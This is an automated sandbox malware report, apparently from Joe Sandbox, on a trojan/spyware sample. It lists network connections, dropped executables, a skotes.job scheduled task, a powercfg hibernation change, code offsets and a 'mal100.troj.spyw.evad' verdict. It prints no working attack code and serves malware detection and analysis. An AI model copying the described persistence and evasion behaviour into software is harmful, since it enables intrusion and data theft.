Source: unknown	Network traffic detected: HTTP traffic on port 49842 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49941

Source: unknown	HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.4:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.4:49763 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50011 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50021 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50028 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50039 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50040 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50041 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50043 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50046 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50047 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50049 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50050 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50053 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50054 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50055 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50056 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50057 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50059 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50061 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50063 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50064 version: TLS 1.2

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: random[1].exe.0.dr	Static PE information: section name:
Source: random[1].exe.0.dr	Static PE information: section name: .idata
Source: DocumentsHDGDGHCAAK.exe.0.dr	Static PE information: section name:
Source: DocumentsHDGDGHCAAK.exe.0.dr	Static PE information: section name: .idata
Source: skotes.exe.9.dr	Static PE information: section name:
Source: skotes.exe.9.dr	Static PE information: section name: .idata
Source: random[1].exe.12.dr	Static PE information: section name:
Source: random[1].exe.12.dr	Static PE information: section name: .idata
Source: 96b31e1a32.exe.12.dr	Static PE information: section name:
Source: 96b31e1a32.exe.12.dr	Static PE information: section name: .idata
Source: random[1].exe0.12.dr	Static PE information: section name:
Source: random[1].exe0.12.dr	Static PE information: section name: .rsrc
Source: random[1].exe0.12.dr	Static PE information: section name: .idata
Source: random[1].exe0.12.dr	Static PE information: section name:
Source: 8490cd1d50.exe.12.dr	Static PE information: section name:
Source: 8490cd1d50.exe.12.dr	Static PE information: section name: .rsrc
Source: 8490cd1d50.exe.12.dr	Static PE information: section name: .idata
Source: 8490cd1d50.exe.12.dr	Static PE information: section name:
Source: random[2].exe.12.dr	Static PE information: section name:
Source: random[2].exe.12.dr	Static PE information: section name: .idata
Source: c511421282.exe.12.dr	Static PE information: section name:
Source: c511421282.exe.12.dr	Static PE information: section name: .idata

Uses powercfg.exe to modify the power settings

Source: C:\Users\user\AppData\Local\Temp\1005413001\test2.exe

Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7F62C0 PR_dtoa,PR_GetCurrentThread,strlen,NtFlushVirtualMemory,PR_GetCurrentThread,memcpy,memcpy,		0_2_6C7F62C0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 12_2_007CCB97 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers,		12_2_007CCB97

Source: C:\Windows\System32\svchost.exe	File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp			Jump to behavior
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	File created: C:\Windows\Tasks\skotes.job			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67AC60	0_2_6C67AC60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C74AC30	0_2_6C74AC30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C736C00	0_2_6C736C00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C66ECC0	0_2_6C66ECC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6CECD0	0_2_6C6CECD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C73ED70	0_2_6C73ED70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C79AD50	0_2_6C79AD50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7F8D20	0_2_6C7F8D20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7FCDC0	0_2_6C7FCDC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C674DB0	0_2_6C674DB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C706D90	0_2_6C706D90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C70EE70	0_2_6C70EE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C750E20	0_2_6C750E20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67AEC0	0_2_6C67AEC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C710EC0	0_2_6C710EC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6F6E90	0_2_6C6F6E90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C732F70	0_2_6C732F70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6DEF40	0_2_6C6DEF40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7B0F20	0_2_6C7B0F20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C676F10	0_2_6C676F10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C74EFF0	0_2_6C74EFF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C670FE0	0_2_6C670FE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7B8FB0	0_2_6C7B8FB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67EFB0	0_2_6C67EFB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C744840	0_2_6C744840
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C0820	0_2_6C6C0820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6FA820	0_2_6C6FA820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7768E0	0_2_6C7768E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A8960	0_2_6C6A8960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C6900	0_2_6C6C6900
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C78C9E0	0_2_6C78C9E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A49F0	0_2_6C6A49F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7309B0	0_2_6C7309B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7009A0	0_2_6C7009A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C72A9A0	0_2_6C72A9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6ECA70	0_2_6C6ECA70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C728A30	0_2_6C728A30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C71EA00	0_2_6C71EA00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6EEA80	0_2_6C6EEA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C776BE0	0_2_6C776BE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C710BA0	0_2_6C710BA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C688460	0_2_6C688460
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6D4420	0_2_6C6D4420
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6FA430	0_2_6C6FA430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C70A4D0	0_2_6C70A4D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B64D0	0_2_6C6B64D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C79A480	0_2_6C79A480
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C710570	0_2_6C710570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6D2560	0_2_6C6D2560
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7B8550	0_2_6C7B8550
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C8540	0_2_6C6C8540
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C774540	0_2_6C774540
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C73A5E0	0_2_6C73A5E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6FE5F0	0_2_6C6FE5F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6645B0	0_2_6C6645B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6CC650	0_2_6C6CC650
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6CE6E0	0_2_6C6CE6E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C70E6E0	0_2_6C70E6E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6946D0	0_2_6C6946D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6F0700	0_2_6C6F0700
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C69A7D0	0_2_6C69A7D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6BE070	0_2_6C6BE070
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C738010	0_2_6C738010
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C73C000	0_2_6C73C000
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C74C0B0	0_2_6C74C0B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6800B0	0_2_6C6800B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C668090	0_2_6C668090
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6D8140	0_2_6C6D8140
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C754130	0_2_6C754130
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6E6130	0_2_6C6E6130
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6701E0	0_2_6C6701E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6F8260	0_2_6C6F8260
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C708250	0_2_6C708250
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C748220	0_2_6C748220
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C73A210	0_2_6C73A210
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7F62C0	0_2_6C7F62C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C73E2B0	0_2_6C73E2B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7422A0	0_2_6C7422A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C706370	0_2_6C706370
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7B2370	0_2_6C7B2370
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C672370	0_2_6C672370
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C78C360	0_2_6C78C360
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C678340	0_2_6C678340
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6E2320	0_2_6C6E2320
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C43E0	0_2_6C6C43E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A23A0	0_2_6C6A23A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6CE3B0	0_2_6C6CE3B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C673C40	0_2_6C673C40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C799C40	0_2_6C799C40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C681C30	0_2_6C681C30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C731CE0	0_2_6C731CE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7ADCD0	0_2_6C7ADCD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C70FC80	0_2_6C70FC80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6D3D00	0_2_6C6D3D00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C741DC0	0_2_6C741DC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C663D80	0_2_6C663D80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7B9D90	0_2_6C7B9D90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7CBE70	0_2_6C7CBE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7F5E60	0_2_6C7F5E60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C77DE10	0_2_6C77DE10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C693EC0	0_2_6C693EC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A5F20	0_2_6C6A5F20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C665F30	0_2_6C665F30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7C7F20	0_2_6C7C7F20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C71BFF0	0_2_6C71BFF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C78DFC0	0_2_6C78DFC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7F3FC0	0_2_6C7F3FC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C691F90	0_2_6C691F90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C743840	0_2_6C743840
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6CD810	0_2_6C6CD810
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C74F8F0	0_2_6C74F8F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67D8E0	0_2_6C67D8E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A38E0	0_2_6C6A38E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7CB8F0	0_2_6C7CB8F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C70F8C0	0_2_6C70F8C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6EF960	0_2_6C6EF960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C72D960	0_2_6C72D960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C725920	0_2_6C725920
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7BF900	0_2_6C7BF900
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7079F0	0_2_6C7079F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6D59F0	0_2_6C6D59F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7099C0	0_2_6C7099C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A99D0	0_2_6C6A99D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C741990	0_2_6C741990
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C681980	0_2_6C681980
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7F9A50	0_2_6C7F9A50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C76DA30	0_2_6C76DA30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C711A10	0_2_6C711A10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6AFA10	0_2_6C6AFA10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C671AE0	0_2_6C671AE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C74DAB0	0_2_6C74DAB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C74FB60	0_2_6C74FB60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6BBB20	0_2_6C6BBB20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B7BF0	0_2_6C6B7BF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C739BB0	0_2_6C739BB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C9BA0	0_2_6C6C9BA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C755B90	0_2_6C755B90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C661B80	0_2_6C661B80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C759430	0_2_6C759430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6FD410	0_2_6C6FD410
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6714E0	0_2_6C6714E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7F14A0	0_2_6C7F14A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7BF510	0_2_6C7BF510
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6D7500	0_2_6C6D7500
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C685510	0_2_6C685510
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6F55F0	0_2_6C6F55F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A9590	0_2_6C6A9590
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C5640	0_2_6C6C5640
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C689650	0_2_6C689650
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C699600	0_2_6C699600
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6E7610	0_2_6C6E7610
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A16A0	0_2_6C6A16A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6D96A0	0_2_6C6D96A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C693720	0_2_6C693720
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C749720	0_2_6C749720
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6DD710	0_2_6C6DD710
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7B37C0	0_2_6C7B37C0
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	Code function: 9_2_006C8860	9_2_006C8860
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	Code function: 9_2_006C7049	9_2_006C7049
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	Code function: 9_2_006C78BB	9_2_006C78BB
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	Code function: 9_2_006C31A8	9_2_006C31A8
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	Code function: 9_2_00797B6E	9_2_00797B6E
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	Code function: 9_2_00684B30	9_2_00684B30
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	Code function: 9_2_006C2D10	9_2_006C2D10
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	Code function: 9_2_00684DE0	9_2_00684DE0
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	Code function: 9_2_006B7F36	9_2_006B7F36
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	Code function: 9_2_006C779B	9_2_006C779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 10_2_007F8860	10_2_007F8860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 10_2_007F7049	10_2_007F7049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 10_2_007F78BB	10_2_007F78BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 10_2_007F31A8	10_2_007F31A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 10_2_007B4B30	10_2_007B4B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 10_2_007F2D10	10_2_007F2D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 10_2_007B4DE0	10_2_007B4DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 10_2_007E7F36	10_2_007E7F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 10_2_007F779B	10_2_007F779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 11_2_007F8860	11_2_007F8860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 11_2_007F7049	11_2_007F7049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 11_2_007F78BB	11_2_007F78BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 11_2_007F31A8	11_2_007F31A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 11_2_007B4B30	11_2_007B4B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 11_2_007F2D10	11_2_007F2D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 11_2_007B4DE0	11_2_007B4DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 11_2_007E7F36	11_2_007E7F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 11_2_007F779B	11_2_007F779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 12_2_007BE530	12_2_007BE530
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 12_2_007D6192	12_2_007D6192
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 12_2_007F8860	12_2_007F8860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 12_2_007B4B30	12_2_007B4B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 12_2_007F2D10	12_2_007F2D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 12_2_007B4DE0	12_2_007B4DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 12_2_007D0E13	12_2_007D0E13
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 12_2_00808E28	12_2_00808E28
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 12_2_00808E28	12_2_00808E28
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 12_2_00808E38	12_2_00808E38
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 12_2_007F7049	12_2_007F7049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 12_2_007F31A8	12_2_007F31A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 12_2_007D1602	12_2_007D1602
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 12_2_007F779B	12_2_007F779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 12_2_007F78BB	12_2_007F78BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 12_2_007D3DF1	12_2_007D3DF1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 12_2_007E7F36	12_2_007E7F36

Source: Joe Sandbox View

Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C6CC5E0 appears 35 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C7A9F30 appears 53 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C693620 appears 96 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C7F09D0 appears 342 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C699B10 appears 109 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C7FD930 appears 66 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C7FDAE0 appears 84 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 007C80C0 appears 393 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 007C7A00 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 007CD64E appears 79 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 007CD942 appears 84 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 007CD663 appears 40 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 007CDF80 appears 81 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 007E8E10 appears 47 times
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	Code function: String function: 006980C0 appears 130 times

Source: file.exe, 00000000.00000002.2028498077.0000000023A06000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCmd.Exe.MUIj% vs file.exe
Source: file.exe, 00000000.00000002.2032719390.000000006F902000.00000002.00000001.01000000.0000000A.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe
Source: file.exe, 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe	Static PE information: Section: oovdzvsf ZLIB complexity 0.9946715214516603
Source: random[1].exe0.12.dr	Static PE information: Section: oovdzvsf ZLIB complexity 0.9946715214516603
Source: 8490cd1d50.exe.12.dr	Static PE information: Section: oovdzvsf ZLIB complexity 0.9946715214516603

Source: c511421282.exe.12.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: random[2].exe.12.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@89/119@7/10

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C6D0300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError,

0_2_6C6D0300

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\NAFZ9AC0.htm

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6340:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7316:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6016:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7560:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7356:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7992:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2104:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7364:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7448:120:WilError_03
